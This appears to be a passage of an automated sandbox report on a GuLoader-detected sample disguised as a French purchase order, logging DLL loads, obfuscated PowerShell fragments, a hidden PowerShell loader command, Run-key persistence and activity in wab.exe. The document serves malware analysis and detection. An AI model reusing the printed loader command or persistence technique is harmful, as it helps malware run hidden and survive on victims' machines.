            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: slc.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rstrtmgr.dllJump to behavior
            Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb source: powershell.exe, 00000002.00000002.2923098281.0000000006FA9000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: qm.Core.pdb source: powershell.exe, 00000002.00000002.2926478638.0000000008029000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdb source: powershell.exe, 00000002.00000002.2905272578.000000000069C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdbk source: powershell.exe, 00000002.00000002.2905272578.000000000069C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000002.00000002.2923098281.0000000006F08000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            Yara detected GuLoader
            Source: Yara matchFile source: 00000002.00000002.2927351766.0000000009F92000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Found suspicious powershell code related to unpacking or dynamic code loading
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Noctilucan $Draine $Grimmere), (Piliganin @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Flirtet = [AppDomain]::CurrentDomain.GetAssemblies()$global:vimfu
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Skovsneppes)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Obstetrik, $false).DefineType($Rumbaing, $Coc
            Obfuscated command line found
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"Jump to behavior
            Suspicious powershell command line found
            Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Interlucent=Get-Content 'C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\unvolubly\Langtrkkendes\Pelletising.Art';$Sciography=$Interlucent.SubString(57898,3);.$Sciography($Interlucent)"
            Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Interlucent=Get-Content 'C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\unvolubly\Langtrkkendes\Pelletising.Art';$Sciography=$Interlucent.SubString(57898,3);.$Sciography($Interlucent)"Jump to behavior
            Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exeCode function: 0_2_00406009 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406009
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_089E2E9C push edi; iretd 2_2_089E2EA6
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_089E148E push 4F85126Ch; ret 2_2_089E149B
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_089E24EB push ebp; ret 2_2_089E24EC
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_089E1795 pushfd ; iretd 2_2_089E1796
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_089E17B5 push eax; retf 2_2_089E182B
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_089E0743 push ecx; ret 2_2_089E075C
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_04162E9C push edi; iretd 7_2_04162EA6
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_0416148E push 4F85126Ch; ret 7_2_0416149B
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_041624EB push ebp; ret 7_2_041624EC
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_04160743 push ecx; ret 7_2_0416075C
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_04161795 pushfd ; iretd 7_2_04161796
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_041617B5 push eax; retf 7_2_0416182B
            Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exeFile created: \commande no 00007 de m.n.s. s.a. 24000127 mns distribution.exe
            Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exeFile created: \commande no 00007 de m.n.s. s.a. 24000127 mns distribution.exeJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\salpetersyrefabrikkers\occupying\Nonsynoptic168\Ridderlige\Phrygian\Overmine\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exeJump to dropped file
            Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run EmraudJump to behavior
            Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run EmraudJump to behavior
            Source: C:\Users\user\Desktop\Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
